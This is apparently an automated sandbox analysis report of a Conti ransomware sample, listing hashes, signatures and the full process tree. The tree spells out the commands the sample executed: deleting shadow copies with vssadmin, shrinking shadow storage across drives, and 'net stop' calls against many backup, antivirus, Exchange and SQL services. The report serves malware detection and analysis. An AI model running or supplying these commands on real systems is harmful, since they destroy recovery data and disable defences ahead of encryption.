Analysis
-
max time kernel
113s -
max time network
121s -
platform
windows7_x64 -
resource
win7 -
submitted
26-08-2020 20:02
General
-
Target
c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe
-
Size
101KB
-
MD5
a200d6c3988d8bf49c305f3e2adee785
-
SHA1
68dcbf15e926bd239026ed065471d914c85f9c75
-
SHA256
c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4
-
SHA512
003efd039edc0f5714853eaaa78e04c6440f707950e9e258ea019ca8573947c7d89b001d711b8e1ab4fb4748af4c488044a4777859f316b91b35672a4da8669e
Score
10/10
Malware Config
Signatures
-
Conti Ransomware
Ransomware generally thought to be a successor to Ryuk.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
-
Drops desktop.ini file(s) 26 IoCs
-
Enumerates connected drives 3 TTPs 18 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe"C:\Users\Admin\AppData\Local\Temp\c14f8bc656284715516f26935afe487a1d584f56ffabbcb98f2974f6ca6cd3a4.bin.exe"1⤵
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin Delete Shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded2⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB2⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded2⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB2⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded2⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin Delete Shadows /all /quiet2⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop "Acronis VSS Provider" /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop "Acronis VSS Provider" /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Acronis VSS Provider" /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop "Enterprise Client Service" /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop "Enterprise Client Service" /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Enterprise Client Service" /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop "SQLsafe Backup Service" /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop "SQLsafe Backup Service" /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SQLsafe Backup Service" /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop "SQLsafe Filter Service" /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop "SQLsafe Filter Service" /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SQLsafe Filter Service" /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop "Veeam Backup Catalog Data Service" /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop "Veeam Backup Catalog Data Service" /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop AcronisAgent /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop AcronisAgent /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop AcrSch2Svc /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop AcrSch2Svc /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop Antivirus /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop Antivirus /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Antivirus /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop ARSM /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop ARSM /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ARSM /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop BackupExecAgentAccelerator /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop BackupExecAgentBrowser /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop BackupExecDeviceMediaService /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop BackupExecDeviceMediaService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop BackupExecJobEngine /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop BackupExecJobEngine /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop BackupExecManagementService /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop BackupExecManagementService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop BackupExecRPCService /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop BackupExecRPCService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop BackupExecVSSProvider /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop BackupExecVSSProvider /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop bedbg /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop bedbg /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop bedbg /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop DCAgent /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop DCAgent /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DCAgent /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop EPSecurityService /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop EPSecurityService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop EPUpdateService /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop EPUpdateService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop EraserSvc11710 /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop EraserSvc11710 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop EsgShKernel /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop EsgShKernel /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop FA_Scheduler /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop FA_Scheduler /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop IISAdmin /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop IISAdmin /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISAdmin /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop IMAP4Svc /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop IMAP4Svc /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IMAP4Svc /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop McShield /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop McShield /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McShield /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop McTaskManager /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop McTaskManager /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McTaskManager /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop mfemms /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop mfemms /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfemms /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop mfevtp /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop mfevtp /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfevtp /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MMS /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MMS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MMS /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop mozyprobackup /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop mozyprobackup /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MsDtsServer /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MsDtsServer /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MsDtsServer100 /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MsDtsServer100 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MsDtsServer110 /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MsDtsServer110 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSExchangeES /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeES /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSExchangeIS /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeIS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSExchangeMGMT /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMGMT /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSExchangeMTA /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeMTA /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSExchangeSA /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeSA /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSExchangeSRS /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSExchangeSRS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSOLAP$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSOLAP$SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSOLAP$SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSOLAP$SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSOLAP$TPS /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSOLAP$TPS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPS /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSOLAP$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSOLAP$TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$BKUPEXEC /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$BKUPEXEC /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$ECWDB2 /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$ECWDB2 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$PRACTICEMGT /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$PRACTICEMGT /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$PRACTTICEBGC /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$PRACTTICEBGC /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$PROFXENGAGEMENT /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$PROFXENGAGEMENT /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$SBSMONITORING /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SBSMONITORING /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$SHAREPOINT /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SHAREPOINT /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$TPS /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$TPS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQL$VEEAMSQL2012 /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$VEEAMSQL2012 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLFDLauncher /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLFDLauncher$SBSMONITORING /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher$SBSMONITORING /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLFDLauncher$SHAREPOINT /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher$SHAREPOINT /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLFDLauncher$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher$SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLFDLauncher$TPS /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher$TPS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLFDLauncher$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLFDLauncher$TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLSERVER /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLSERVER /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLServerADHelper100 /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper100 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MSSQLServerOLAPService /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerOLAPService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop MySQL57 /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop MySQL57 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL57 /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop ntrtscan /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop ntrtscan /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ntrtscan /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop OracleClientCache80 /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleClientCache80 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop PDVFSService /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop PDVFSService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop POP3Svc /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop POP3Svc /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop POP3Svc /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop ReportServer /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop ReportServer /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop ReportServer$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop ReportServer$SQL_2008 /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop ReportServer$SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop ReportServer$SYSTEM_BGC /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop ReportServer$TPS /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop ReportServer$TPS /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop ReportServer$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop ReportServer$TPSAMA /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop RESvc /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop RESvc /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RESvc /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop sacsvr /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop sacsvr /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sacsvr /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SamSs /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop SamSs /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SamSs /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SAVAdminService /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop SAVAdminService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SAVService /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop SAVService /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SAVService /y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net stop SDRSVC /y2⤵
-
C:\Windows\SysWOW64\net.exenet stop SDRSVC /y3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SDRSVC /y4⤵
-
